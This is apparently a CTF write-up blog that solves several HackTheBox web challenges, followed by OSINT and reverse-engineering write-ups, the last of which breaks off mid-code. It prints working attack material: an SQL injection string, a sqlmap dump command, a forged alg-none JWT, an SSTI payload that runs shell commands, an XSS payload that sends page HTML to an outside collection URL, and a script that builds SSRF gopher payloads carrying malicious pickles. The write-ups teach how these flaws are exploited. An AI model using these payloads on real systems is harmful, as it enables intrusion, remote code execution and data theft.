Open the website in Burp Suite monitored browsers, open the shell and type in the command /ping 127.0.0.1, and we see in Burp Suite HTTP history has a POST request to /api/ping

Turn to the challenge source code, at index.php, the /api/ping route is handled the method ping of class ReconController

ReconController.ping() will create instance of ReconModel and its getOutput() method, which will pass the user-controlled ip parameters to the ping command but without any command injection filters, means this is an easy command injection chals

Escape the ping command with the command separator ;, cat the flag, which is stored at /flag.txt in docker container

Flag is: HTB{4lw4y5_54n1t1z3_u53r_1nput!!!}

Drobots

Given file: Get it here!
Description: Pandora’s latest mission as part of her reconnaissance training is to infiltrate the Drobots firm that was suspected of engaging in illegal activities. Can you help pandora with this task?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Very Easy

We are given a website and a zip file containing the website’s source.

After a quick analyze on the source, I get to understand that either we have to use SQL Injection or use a specific parameter to get to the next page.

Input admin for the username and " OR 1 = 1 – - for the password, or add /home to the URL will grant you access to the next page, which turns out to also contain the flag.

Flag is: HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!}

Passman

Given file: Get it here
Description: Pandora discovered the presence of a mole within the ministry. To proceed with caution, she must obtain the master control password for the ministry, which is stored in a password manager. Can you hack into the password manager?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Easy

The challenge starts with a login screen.

Looking at entrypoint.sh in sources, it appears that an admin account is existed, but the password was random generated so we may have to find someway to get access to admin account later on to finish the challnege.

First create normal account then login. After login success, we are greeted with the dashboard home

Click on the plus button, a form to store credential for online website appears. Fill and submit the form, a new item was created.

Switch to Burp Suite HTTP History panels to look for intersting requests.

It seems that the website uses single POST /graphql endpoint with the JSON body contain query field to dictate the server response.

It’s time to get back to the source for more clues. Here the /graphql endpoint will be handled by a GraphQlSchema defined in helpers/GraphqlHelper.js

In the GraphQLObjectType object mutationType, there is an interesting field UpdatePassword

The UpdatePassword graphql handler receive username and password, it just checks whether the user is authenticated then just ouright runs the update password to any usernames it receives without checking whether the current user is the same as user that is gonna haved his/her password changes, some resource authorization problems here.

Open BurpSuite, send the request POST /graphql to repeater, edit the JSON body to use UpdatePassword graphql handler.

The admin password is updated successfully. Now login as admin.

The flag contents said it was IDOR vulnerabilities, which is actually an incorrect authorization related problem.

Flag is: HTB{1d0r5_4r3_s1mpl3_4nd_1mp4ctful!!}

Orbital

Given file:: Get it here
Description: In order to decipher the alien communication that held the key to their location, she needed access to a decoder with advanced capabilities - a decoder that only The Orbital firm possessed. Can you get your hands on the decoder?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Easy

At first, we were given the login page which requires credentials. There’s nothing else you can do at this point than reading given code.

Upon given the code, you can find out that there is 1 user “admin” which is initiated at the time the docker is created. We can also see that, the application only has SELECT privilege on table orbital.users and orbital.communications.

mysql -u root << EOF
CREATE DATABASE orbital;
CREATE TABLE orbital.users (
 id INTEGER PRIMARY KEY AUTO_INCREMENT,
 username varchar(255) NOT NULL UNIQUE,
 password varchar(255) NOT NULL
);
CREATE TABLE orbital.communication (
 id INTEGER PRIMARY KEY AUTO_INCREMENT,
 source varchar(255) NOT NULL,
 destination varchar(255) NOT NULL,
 name varchar(255) NOT NULL,
 downloadable varchar(255) NOT NULL
);
INSERT INTO orbital.users (username, password) VALUES ('admin', '$(genPass)');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Titan', 'Arcturus', 'Ice World Calling Red Giant', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Andromeda', 'Vega', 'Spiral Arm Salutations', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Proxima Centauri', 'Trappist-1', 'Lone Star Linkup', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('TRAPPIST-1h', 'Kepler-438b', 'Small World Symposium', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Winky', 'Boop', 'Jelly World Japes', 'communication.mp3');
CREATE USER 'user'@'localhost' IDENTIFIED BY 'M@k3l@R!d3s$';
GRANT SELECT ON orbital.users TO 'user'@'localhost';
GRANT SELECT ON orbital.communication TO 'user'@'localhost';
FLUSH PRIVILEGES;
EOF

Now let’s move on with the application. At first glance at source code, we can see it is vulnerable to Local File Inclusion attack at this endpoint blueprints/routes.py.

from flask import Blueprint, render_template, request, session, redirect, send_file
from application.database import login, getCommunication
from application.util import response, isAuthenticated

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

@web.route('/')
def signIn():
 return render_template('login.html')

@web.route('/logout')
def logout():
 session['auth'] = None
 return redirect('/')

@web.route('/home')
@isAuthenticated
def home():
 allCommunication = getCommunication()
 return render_template('home.html', allCommunication=allCommunication)

@api.route('/login', methods=['POST'])
def apiLogin():
 if not request.is_json:
 return response('Invalid JSON!'), 400

 data = request.get_json()
 username = data.get('username', '')
 password = data.get('password', '')

 if not username or not password:
 return response('All fields are required!'), 401

 user = login(username, password)

 if user:
 session['auth'] = user
 return response('Success'), 200

 return response('Invalid credentials!'), 403

@api.route('/export', methods=['POST'])
@isAuthenticated
def exportFile():
 if not request.is_json:
 return response('Invalid JSON!'), 400

 data = request.get_json()
 communicationName = data.get('name', '')

 try:
 # Everyone is saying I should escape specific characters in the filename. I don't know why.
 return send_file(f'/communications/{communicationName}', as_attachment=True)
 except:
 return response('Unable to retrieve the communication'), 400

Here we can see when we call /api/export with POST method it will use body parameter name to get the files. We can exploit this to get the flag using something like name=../../../../flag.txt. But to use this endpoint, we must be authenticated, at the context of this challenge only “admin” user can be authenticated.

Looking at how authentication works, I found out a place that is vulnerable to SQL Injection. However keep in mind that we are only granted access to SELECT on table users and communications. I decided to use sqlmap to save the what’re left of my brain cells.

def login(username, password):
 # I don't think it's not possible to bypass login because I'm verifying the password later.
 user = query(f'SELECT username, password FROM users WHERE username = "{username}"', one=True)

 if user:
 passwordCheck = passwordVerify(user['password'], password)

 if passwordCheck:
 token = createJWT(user['username'])
 return token
 else:
 return False

I decided to use Burpsuite to capture to login request, modified the field username with value * and saved it for the usage of sqlmap.

I saved it as req.txt. Since the database and the table was already known the command I used was:

sqlmap -r req.txt --level=5 --risk=3 --technique=T -o --ignore-code 401 -D orbital -T users --dump

Nice but we only got the hash. Initially, I was trying to use hashcat but since this is HackTheBox, the challenge may use well-known hash so I throwed it on the internet and Voila! The credential is admin:ichliebedich, login and use LFI attack the get flag.

Flag is: HTB{T1m3_b4$3d_$ql1_4r3_fun!!!}

Didactic Octo Paddles

Given File: Get it here
Description: You have been hired by the Intergalactic Ministry of Spies to retrieve a powerful relic that is believed to be hidden within the small paddle shop, by the river. You must hack into the paddle shop’s system to obtain information on the relic’s location. Your ultimate challenge is to shut down the parasitic alien vessels and save humanity from certain destruction by retrieving the relic hidden within the Didactic Octo Paddles shop.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Medium

This time it gives us a login panel like the last time. Except this time it also has register function. Let’s look at the main routes in the source code.

challenge/routes/index.js

module.exports = (db) => {
 const bcrypt = require("bcryptjs");
 const router = require("express").Router();
 const jwt = require("jsonwebtoken");
 const jsrender = require("jsrender");
 const AuthMiddleware = require("../middleware/AuthMiddleware");
 const AdminMiddleware = require("../middleware/AdminMiddleware");
 const { tokenKey, getUserId } = require("../utils/authorization");

 const response = (data) => ({ message: data });

 router.get("/", AuthMiddleware, async (req, res) => {
 try {
 const products = await db.Products.findAll();
 res.render("index", { products: products });
 } catch (error) {
 console.error(error);
 res.status(500).send("Something went wrong!");
 }
 });

 ........

 router.post("/register", async (req, res) => {
 try {
 const username = req.body.username;
 const password = req.body.password;

 if (!username || !password) {
 return res
 .status(400)
 .send(response("Username and password are required"));
 }

 const existingUser = await db.Users.findOne({
 where: { username: username },
 });
 if (existingUser) {
 return res
 .status(400)
 .send(response("Username already exists"));
 }

 await db.Users.create({
 username: username,
 password: bcrypt.hashSync(password),
 }).then(() => {
 res.send(response("User registered succesfully"));
 });
 } catch (error) {
 console.error(error);
 res.status(500).send({
 error: "Something went wrong!",
 });
 }
 });

 ........

 router.post("/login", async (req, res) => {
 try {
 const username = req.body.username;
 const password = req.body.password;

 if (!username || !password) {
 return res
 .status(400)
 .send(response("Username and password are required"));
 }

 const user = await db.Users.findOne({
 where: { username: username },
 });
 if (!user) {
 return res
 .status(400)
 .send(response("Invalid username or password"));
 }

 const validPassword = bcrypt.compareSync(password, user.password);
 if (!validPassword) {
 return res
 .status(400)
 .send(response("Invalid username or password"));
 }

 const token = jwt.sign({ id: user.id }, tokenKey, {
 expiresIn: "1h",
 });

 res.cookie("session", token);

 return res.status(200).send(response("Logged in successfully"));
 } catch (error) {
 console.error(error);
 res.status(500).send({
 error: "Something went wrong!",
 });
 }
 });

 ........

 router.get("/admin", AdminMiddleware, async (req, res) => {
 try {
 const users = await db.Users.findAll();
 const usernames = users.map((user) => user.username);

 res.render("admin", {
 users: jsrender.templates(`${usernames}`).render(),
 });
 } catch (error) {
 console.error(error);
 res.status(500).send("Something went wrong!");
 }
 });

 router.get("/logout", async (req, res) => {
 res.clearCookie("session");
 return res.redirect("/");
 });

 return router;
};

Okay, so it has some basic authentication funtions like register, login and logout; in addition to that we also has 2 authorization middlewares AdminMiddleware and AuthMiddleware. And they all use Json Web Token (JWT).

router.get("/admin", AdminMiddleware, async (req, res) => {
 try {
 const users = await db.Users.findAll();
 const usernames = users.map((user) => user.username);

 // This pepega jsrender things
 res.render("admin", {
 users: jsrender.templates(`${usernames}`).render(),
 });
 } catch (error) {
 console.error(error);
 res.status(500).send("Something went wrong!");
 }
});

router.get("/logout", async (req, res) => {
 res.clearCookie("session");
 return res.redirect("/");
});

return router;

What really stands out of them all is at the /admin endpoint which allows us to inject something in the template. But first, we need to bypass the AuthMiddleware. Looking what it does, we find something really interesting.

const AdminMiddleware = async (req, res, next) => {
 try {
 const sessionCookie = req.cookies.session;
 if (!sessionCookie) {
 return res.redirect("/login");
 }
 const decoded = jwt.decode(sessionCookie, { complete: true });

 if (decoded.header.alg == 'none') {
 return res.redirect("/login");
 } else if (decoded.header.alg == "HS256") {
 const user = jwt.verify(sessionCookie, tokenKey, {
 algorithms: [decoded.header.alg],
 });
 if (
 !(await db.Users.findOne({
 where: { id: user.id, username: "admin" },
 }))
 ) {
 return res.status(403).send("You are not an admin");
 }
 } else {
 const user = jwt.verify(sessionCookie, null, {
 algorithms: [decoded.header.alg],
 });
 if (
 !(await db.Users.findOne({
 where: { id: user.id, username: "admin" },
 }))
 ) {
 return res
 .status(403)
 .send({ message: "You are not an admin" });
 }
 }
 } catch (err) {
 return res.redirect("/login");
 }
 next();
};

Do you see something fun here ? It checks for the header algorith field. If it is none, it makes us login again. And if it is HS256, which basically the same algorithm it uses to authenticate, the app verifies using the random generated key. Or “else” it verifies with no key at all. This is fun because only with algorithm none, the function verify would work.

I was banging my head for a while, I realised that it doesn’t check for NoNe, NonE but it is still able to decoded and verified. That lead us to craft a JWT to pass to the session cookie for admin previlege. I crafted the JWT manually 😵‍💫.

eyJhbGciOiJOb05lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwiaWF0IjoxNjc5NTk0OTY1LCJleHAiOjI2Nzk1OTg1NjV9.
{
 "alg": "None",
 "typ": "JWT"
}
{
 "id": 1,
 "iat": 1679594965,
 "exp": 2679598565
}

I modified the algorithm to None, “id” to 1 as 1 is the id of “admin” and set the expiration time to oblivion so I can take my time to get the flag.

For the flag, look again at the routes’ functions, we can get the flag through SSTI on jsrender. To do so the payload must be one of the usernames registered. Only thing we have to do now is to register a new account with the payload for the username.

{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag.txt').toString()")()}}

Flag is: HTB{Pr3_C0MP111N6_W17H0U7_P4DD13804rD1N6_5K1115}

SpyBug

Given file:: Get it here
Description: As Pandora made her way through the ancient tombs, she received a message from her contact in the Intergalactic Ministry of Spies. They had intercepted a communication from a rival treasure hunter who was working for the alien species. The message contained information about a digital portal that leads to a software used for intercepting audio from the Ministry’s communication channels. Can you hack into the portal and take down the aliens counter-spying operation?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Medium

Right, another login panel with no reigster. But wait what’s that ? Look at the source code closely, we will have 2 main routes: routes/agents and routes/main.

// agents.js
const fs = require("fs");
const path = require("path");
const { v4: uuidv4 } = require("uuid");

const express = require("express");
const router = express.Router();

const multer = require("multer");

const {
 registerAgent,
 updateAgentDetails,
 createRecording,
} = require("./../utils/database");

const authAgent = require("../middleware/authagent");

const storage = multer.diskStorage({
 filename: (req, file, cb) => {
 cb(null, uuidv4());
 },
 destination: (req, file, cb) => {
 cb(null, "./uploads");
 },
});

const multerUpload = multer({
 storage: storage,
 fileFilter: (req, file, cb) => {
 if (
 file.mimetype === "audio/wave" &&
 path.extname(file.originalname) === ".wav"
 ) {
 cb(null, true);
 } else {
 return cb(null, false);
 }
 },
});

router.get("/agents/register", async (req, res) => {
 res.status(200).json(await registerAgent());
});

router.get("/agents/check/:identifier/:token", authAgent, (req, res) => {
 res.sendStatus(200);
});

router.post(
 "/agents/details/:identifier/:token",
 authAgent,
 async (req, res) => {
 const { hostname, platform, arch } = req.body;
 if (!hostname || !platform || !arch) return res.sendStatus(400);
 await updateAgentDetails(req.params.identifier, hostname, platform, arch);
 res.sendStatus(200);
 }
);

router.post(
 "/agents/upload/:identifier/:token",
 authAgent,
 multerUpload.single("recording"),
 async (req, res) => {
 if (!req.file) return res.sendStatus(400);

 const filepath = path.join("./uploads/", req.file.filename);
 const buffer = fs.readFileSync(filepath).toString("hex");

 if (!buffer.match(/52494646[a-z0-9]{8}57415645/g)) {
 fs.unlinkSync(filepath);
 return res.sendStatus(400);
 }

 await createRecording(req.params.identifier, req.file.filename);
 res.send(req.file.filename);
 }
);

module.exports = router;


// panel.js
const express = require("express");
const router = express.Router();

const {
 checkUserLogin,
 getAgents,
 getRecordings,
} = require("./../utils/database");

const authUser = require("../middleware/authuser");

router.get("/panel", authUser, async (req, res) => {
 res.render("panel", {
 username:
 req.session.username === "admin"
 ? process.env.FLAG
 : req.session.username,
 agents: await getAgents(),
 recordings: await getRecordings(),
 });
});

router.get("/panel/logout", authUser, (req, res) => {
 req.session.destroy();
 res.redirect("/panel/login");
});

router.get("/panel/login", (req, res) => {
 res.render("login");
});

router.post("/panel/login", async (req, res) => {
 let username = req.body.username;
 let password = req.body.password;

 if (!(username && password)) return res.sendStatus(400);
 if (!(await checkUserLogin(username, password)))
 return res.redirect("/panel/login");

 req.session.loggedin = true;
 req.session.username = username;

 res.redirect("/panel");
});

module.exports = router;

Let’s summarize what they do.

routes/agent.js has register function which returns an id and a token that we can use to upload a file. And we can only upload a file with the header which is somewhat similar to WAV file. We can also modify hostname, arch and platform.

routes/panel.js which only accepts credential of admin. If the provided credential is valid, the main panel will render with the recordings that agents provide.

Let’s keep in mind that there is a bot being generated at every 60 seconds. This bot will login to the panel and review all panel at a context of a browser. This is no doubt an Client-Side challenge.

// index.js
const { visitPanel } = require("./utils/adminbot");
............
createAdmin();
setInterval(visitPanel, 60000);


// utils/adminbot.js
require("dotenv").config();

const puppeteer = require("puppeteer");

const browserOptions = {
 headless: true,
 executablePath: "/usr/bin/chromium-browser",
 args: [
 "--no-sandbox",
 "--disable-background-networking",
 "--disable-default-apps",
 "--disable-extensions",
 "--disable-gpu",
 "--disable-sync",
 "--disable-translate",
 "--hide-scrollbars",
 "--metrics-recording-only",
 "--mute-audio",
 "--no-first-run",
 "--safebrowsing-disable-auto-update",
 "--js-flags=--noexpose_wasm,--jitless",
 ],
};

exports.visitPanel = async () => {
 try {
 const browser = await puppeteer.launch(browserOptions);
 let context = await browser.createIncognitoBrowserContext();
 let page = await context.newPage();

 await page.goto("http://0.0.0.0:" + process.env.API_PORT, {
 waitUntil: "networkidle2",
 timeout: 5000,
 });

 await page.type("#username", "admin");
 await page.type("#password", process.env.ADMIN_SECRET);
 await page.click("#loginButton");

 await page.waitForTimeout(5000);
 await browser.close();
 } catch (e) {
 console.log(e);
 }
};

Well since I really wanted to know how the recordings being rendered. I will create a Docker. For those who are new to CTFs, Docker is a good way to debug what really happens behind the curtain.

For the purpose of testing I will modify ./build-docker.sh to

#!/bin/bash
docker stop web_spybug
docker rm web_spybug
docker rmi $(docker images -f dangling=true -q)
docker rmi $(docker images -q web_spybug)
docker build --tag=web_spybug .
docker run -p 1337:1337 -e API_PORT=1337 -e FLAG="HTB{f4k3_fl4g_f0r_t3st1ng}" -e SESSION_SECRET=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1) -e ADMIN_SECRET="admin" web_spybug

I changed the admin password from randomly generated 32 characters string to admin. Let’s build and run the docker using command ./build-docker.sh

While waiting our docker finishes building and runs. Let’s look at how are we able to perform such Client-Side XSS attack. Let’s look at the template views/panel.pug, we will find 2 places that we can place our payload.

if agents.length > 0
 table.w-100
 thead
 tr
 th ID
 th Hostname
 th Platform
 th Arch
 tbody
 each agent in agents
 tr
 td= agent.identifier
 td !{agent.hostname}
 td !{agent.platform}
 td !{agent.arch}

tbody
 each recording in recordings
 tr
 td= recording.agentId
 td
 audio(controls='')
 source(src=recording.filepath)

The first flashes through my mind is !{agent.hostname}, !{agent.platform} and !{agent.arch}. Upon reading the pug/jade document

Aaaaaah, so no escape then, so we just need to fix the hostname or platform or arch to <script>(evil xss)</script> right ? Unfortunately, it won’t work. Let’s look at the index.js again.

application.use((req, res, next) => {
 res.setHeader("Content-Security-Policy", "script-src 'self'; frame-ancestors 'none'; object-src 'none'; base-uri 'none';");
 res.setHeader("Cache-Control", "no-cache, no-store, must-revalidate");
 res.setHeader("Pragma", "no-cache");
 res.setHeader("Expires", "0");
 next();
});

There is CSP rule set that only allows source from self. What we were trying is called inline. You can read the material here.

Don’t worry, I said 2 things come to my mind while reading the template. The second thing is that the audio use our uploaded WAV file. There is a good writeup in the past that can clear your mind out. This challenge is more simple. It only checks the header, not the entire file. So we can use hexedit to edit the header of the file to WAV header and include our xss payload. You can either use hexedit on your laptop or like me use an online hexeditor.

But doesn’t it use <audio> tag, how can the script be executed ? You’re right, we can’t. However if something like <script src="our-evil-media-file.wav"></script> appears, it will execute our payload like a charm. Well how can we make it appear ? Use !{hostname} obviously.

Okay let’s go and try out our web built from the docker at localhost:1337. We can use admin:admin to login to the panel now.

You can either create a form with html to deal with the endpoints and upload file or use Postman to deal with it like me.

First me need to register an agent.

Use the id and token returned for uploading the file that contains the payload.

And finally, inject into html.

Spectacular !! Now we only need to modify our payload for it to get all content of the html page at send it to our self hosted server or maybe RequestBin. The payload I used:

// change the url of the requestbin
fetch('https://ensei2x093jq8.x.pipedream.net?muneh=' + document.documentElement.innerHTML)

Repeat all the steps above against challenge server. We will see the flag in the RequestBin we created.

Flag is: HTB{p01yg10t5_4nd_35p10n4g3}

TrapTrack

Given file:: Get it here
Description: The aliens have prepared several trap websites to spread their propaganda campaigns on the internet. Our intergalactic forensics team has recovered an artifact of their health check portal that keeps track of their trap websites. Can you take a look and see if you can infiltrate their system?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Hard

Right … Another login panel, excepts, now the credential is harcoded in to the source code ε-(´・｀) ﾌ

Use that cred and login to panel. Here at the panel, we see some kind of URL health checking going on.

Let’s try to put some URL in. How about our little RequestBin.

Result:

Very noice. So it really does somewhat of a CURL thing. Let’s look at the source code and this time I’ll ask ChatGPT what the challenge does.

blueprints/routes.py

import json
from application.database import db, User, TrapTracks
from flask import Blueprint, Response, jsonify, redirect, render_template, request
from flask_login import login_required, login_user, logout_user
from application.cache import get_job_list, create_job_queue, get_job_queue

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

def response(message, status=200):
 return jsonify({'message': message}), status

@web.route('/', methods=['GET'])
def login():
 return render_template('login.html')

@api.route('/login', methods=['POST'])
def user_login():
 if not request.is_json:
 return response('Missing required parameters!', 401)

 data = request.get_json()
 username = data.get('username', '')
 password = data.get('password', '')

 if not username or not password:
 return response('Missing required parameters!', 401)

 user = User.query.filter_by(username=username).first()

 if not user or not user.password == password:
 return response('Invalid username or password!', 403)

 login_user(user)
 return response('User authenticated successfully!')

@web.route('/admin/')
@login_required
def scrape_list():
 trap_tracks = TrapTracks.query.all()
 return render_template('admin.html', tracks=trap_tracks)

@api.route('/tracks/list', methods=['GET'])
@login_required
def job_list():
 data = get_job_list()

 if not data:
 return Response(json.dumps([]), mimetype='application/json')

 return Response(json.dumps(data), mimetype='application/json')

@api.route('/tracks/add', methods=['POST'])
@login_required
def tracks_add():
 if not request.is_json:
 return response('Missing required parameters!', 401)

 data = request.get_json()

 trapName = data.get('trapName', '')
 trapURL = data.get('trapURL', '')

 if not trapName or not trapURL:
 return response('Missing required parameters!', 401)

 async_job = create_job_queue(trapName, trapURL)

 track = TrapTracks(trap_name=trapName, trap_url=trapURL, track_cron_id=async_job['job_id'])

 db.session.add(track)
 db.session.commit()

 return response('Trap Track added successfully!', 200)

@api.route('/tracks/delete', methods=['POST'])
@login_required
def tracks_del():
 if not request.is_json:
 return response('Missing required parameters!', 401)

 data = request.get_json()

 trackID = data.get('id', '')

 if not trackID:
 return response('Missing required parameters!', 401)

 try:
 TrapTracks.query.filter_by(id=int(trackID)).delete()
 db.session.commit()
 except Exception as e:
 pass

 return response('Trap Track deleted successfully!', 200)


@api.route('/tracks/<int:job_id>/status', methods=['GET'])
@login_required
def job_status(job_id):
 data = get_job_queue(job_id)

 if not data:
 return response('Job does not exist!', 401)

 return Response(json.dumps(data), mimetype='application/json')

@web.route('/logout')
@login_required
def logout():
 logout_user()
 return redirect('/')

> This code is a Flask web application that has two blueprints (web and api) and uses a database to store and manage User and TrapTracks models.
>
> The web blueprint defines three routes:
>
> 1. '/' that renders a login template.
> 2. '/admin/' that requires login and renders an admin template with all TrapTracks.
> 3. '/logout' that requires login and logs out the user.
>
> The api blueprint defines four routes:
> 1. '/login' that receives a POST request with a JSON payload containing a username and password field, authenticates the user, and returns a response with a message.
> 2. '/tracks/list' that requires login and returns a response with all the TrapTracks.
> 3. '/tracks/add' that requires login and receives a POST request with a JSON payload containing a trapName and a trapURL field, adds a new TrapTrack to the database, and returns a response with a message.
> 4. '/tracks/delete' that requires login and receives a POST request with a JSON payload containing an id field that corresponds to a TrapTrack to be deleted from the database.
> The response function is a helper function that returns a JSON response with a message and an optional status.
> The code uses Flask-Login to manage user authentication and Flask-Caching to cache job data.
> --ChatGPT--

Hmmm, pretty neat, so it does keep records of all the tracks or we might say all the jobs. Let’s look deeper into how the jobs are created and executed.

from flask import current_app
import pickle, base64

def env(key):
 val = False
 try:
 val = current_app.config[key]
 finally:
 return val

def get_job_list():
 data = current_app.redis.hkeys(env('REDIS_JOBS'))
 data = [job_id.decode() for job_id in data]

 return data

def get_job_id():
 job_id = current_app.redis.get(env('REDIS_NUM_JOBS'))
 current_app.redis.incr(env('REDIS_NUM_JOBS'))
 return job_id

def create_job_queue(trapName, trapURL):
 job_id = get_job_id()

 data = {
 'job_id': int(job_id),
 'trap_name': trapName,
 'trap_url': trapURL,
 'completed': 0,
 'inprogress': 0,
 'health': 0
 }

 current_app.redis.hset(env('REDIS_JOBS'), job_id, base64.b64encode(pickle.dumps(data)))

 current_app.redis.rpush(env('REDIS_QUEUE'), job_id)

 return data

def get_job_queue(job_id):
 data = current_app.redis.hget(env('REDIS_JOBS'), job_id)
 if data:
 return pickle.loads(base64.b64decode(data))

 return None

Okay, so it has some function like:

Get all jobs’ IDs from Redis database
Get current incremented ID
Queue a job in the database
Get the data from of a job with given ID

What truely stand out of all these are these line:

def get_job_queue(job_id):
 data = current_app.redis.hget(env('REDIS_JOBS'), job_id)
 if data:
 return pickle.loads(base64.b64decode(data)) # My money maker

 return None

The principal is somewhat similar to a misc chall called Hijack. This is no doubt a pickle deserialization attack which can execute remote code, our code.

Is this the end of the challenge? Well, no. Let’s look up a few lines and see why.

def create_job_queue(trapName, trapURL):
 job_id = get_job_id()

 data = {
 'job_id': int(job_id),
 'trap_name': trapName,
 'trap_url': trapURL,
 'completed': 0,
 'inprogress': 0,
 'health': 0
 }

 current_app.redis.hset(env('REDIS_JOBS'), job_id, base64.b64encode(pickle.dumps(data))) # This line right here

 current_app.redis.rpush(env('REDIS_QUEUE'), job_id)

 return data

The data that should give us way to pass in our malicious class is actually serialized before it can be unserialized. The challenge is not that simple as it looks anymore.

Another features of the app is that health checking thing. It takes a URL and calls to URL regardless of host and protocol. This is perfect as we know Redis also runs on this challenge instance and our data is stored on it including those jobs. So if we can somehow manange this feature to change the data of a job to a pickle serialized base64 encoded string of an “evil” object, when this data os loaded, there will be RCE. This can be done with the URL health check features.

So to summarize, we will make use of SSRF vulnerabilities to change the data so it can trigger pickle deserialzation attack.

Good theory, but how can we perform such an attack. There are good resources on this:

https://infosecwriteups.com/exploiting-redis-through-ssrf-attack-be625682461b

https://trevorsaudi.medium.com/ssrf-to-gaining-rce-rootme-ssrf-box-31b7d0e5ad08

There’s a tool called Gopherus but since this challenge is more simple, I will try to modify a script on a github repo to:

from __future__ import print_function

import os
import sys
import base64
import urllib.parse
import pickle
import subprocess


def generate_resp(command):
 res = ""

 if isinstance(command, list):
 pass
 else:
 command = command.split(" ")

 res += "*{}\n".format(len(command))
 for cmd in command:
 res += "${}\n".format(len(cmd))
 res += "{}\n".format(cmd)

 return res

def generate_gopher(payload):

 final_payload = "gopher://127.0.0.1:6379/_{}".format(urllib.parse.quote(payload))
 return final_payload

class PickleExploit(object):
 def __init__(self, command):
 self.cmd = command

 def __reduce__(self):
 cmd = command
 return (os.system, (cmd,))

def pickle_payload(key, field, command):
 res = ""

 payload = pickle.dumps(PickleExploit(command))
 res += "\r\n"
 res += generate_resp("hset {} {} {}".format(key, field, base64.b64encode(payload).decode()))

 res = res.replace("\n", "\r\n")

 print(generate_gopher(res))

if sys.argv[1] == "pickle":
 key = input("Key name > ")
 field = input("Field name > ")
 command = input("Command > ")
 pickle_payload(key, field, command)

This pickle serialized thing works fine on Unix platform. It should also works fine on Windows platform usually, however if you experience any errors on your Windows machine, try to use WSL (Window Subsystem Linux), install Linux on a Virtual Machine or buy a MacBook. 💸💸💸

With that script let’s try to finalize our work. We will try to change hvalue of jobs from hfield of 100 (which is the first key:value pair of jobs). Why jobs ? Because it is the hash key that stores the jobs which contain the serialized object. Why change it ? So we can inject a evil-crafted serialized object of our own so when it is loaded, the command we want to run will be executed.

Overall the technique to solve this challenge is not too flashy, it still requires a lot of knowledge around it. Very nice chall. Hope we all learn something from it.

Flag is: HTB{tr4p_qu3u3d_t0_rc3!}

Original Posts

From FazeCT

idekCTF 2022 - Osint/Osint Crime Confusion 3: W as in Who

Mon, 16 Jan 2023 03:50:54 +0000

Table of Contents

Introduction

Given image: Get it here!

Description: I feel the killer might be dangerous so I have some info to give you but I don’t want to disclose my email just like that. So find my review from the image below and send me an email asking for info. Be creative with the signature so I know its you. It is time to find Who is the killer.

Category: OSINT

Finding the location

From the given image, I managed to have found the location on Google Maps at 41.154248, -8.682320.

Then in the comment section of the location, I got the mentioned secret email, labeled noodlesareramhackers@gmail.com.

Getting further informations

I then sent an email to the email above, and got the next instructions.

Finding the deleted tweet

In the first challenge of the Osint Crime Confusion set (W is for Where), I found the instagram of a person named Heather James.

Then from this person’s informations, I found the twitter account of University of Dutch ThE of Topics in Science.

I then immediately knew we have to bring the account to the Wayback Machine to gain access to the deleted tweet. The email did mention about the tweet’s id (1612383535549059076), so we can paste this URL into the Wayback Machine: https://twitter.com/UThE_TS/status/1612383535549059076

We successfully gained access to the deleted tweet!

Exploring the killer’s GitHub

From the email, we also know that we should continue searching in GitHub. Frankly enough, when I tried to search for “potatoes eating camels” in GitHub, this showed up:

The descriptions imply that the person is “still improving wiki”. We then head into the wiki of this repository to find out the end of our journey.

Concatenate the first letters of the last 7 sentences of the poem, we have our flag for the challenge: idek{JULIANA_APOSIDM723489}.

Conclusion

A good OSINT challenge overall, consist of several general skills in the field of OSINT, such as using Wayback Machine or finding locations on Google Maps.

ISITDTU CTF 2022 Finals - Slow

Fri, 13 Jan 2023 15:44:54 +0000

ctf

writeup

isitdtu-2022

Table of Contents

Introduction

Given binary: Get it here!

Description: If you can make the program runs faster, you’ll get the flag!

Category: Reverse Engineering

Static Analysis

The challenge provides us with a single binary, named slow.exe. By using IDA Pro or Ghidra or any other kinds of decompiler, we will get the decompiled code.

Analyze the main function, we claim that the program initiates an array whose size is 45, then modifies it through some more functions, as shown below.

int __cdecl main(int argc, const char **argv, const char **envp)
{
 void *Block; // [esp+4h] [ebp-BCh]
 int v5[45]; // [esp+8h] [ebp-B8h] BYREF

 v5[0] = 10;
 v5[1] = -3;
 ... snip
 v5[43] = 14;
 v5[44] = 16;
 Block = (void *)sub_401AC0(v5, 38, 0);
 sub_4013B0(Block);
 sub_401B40(Block);
 return 0;
}

The function sub_401AC0(v5, 38, 0) allocates dynamic memory using malloc based on v5 then assigns it into variable Block. That variable is then being passed into function sub_4013B0(Block), which will produce our flag once we have fixed it.

int __cdecl sub_4013B0(_DWORD *a1)
{
 int result; // eax
 int v2; // eax
 int v3; // [esp+4h] [ebp-64h]
 ... snip
 int v37; // [esp+64h] [ebp-4h]
 int v38; // [esp+64h] [ebp-4h]

 while ( 1 )
 {
 v6 = *(_DWORD *)(a1[1] + 4 * a1[3]++);
 result = v6 - 1;
 switch ( v6 )
 {
 case 1:
 v22 = *(_DWORD *)(a1[2] + 4 * a1[4]--);
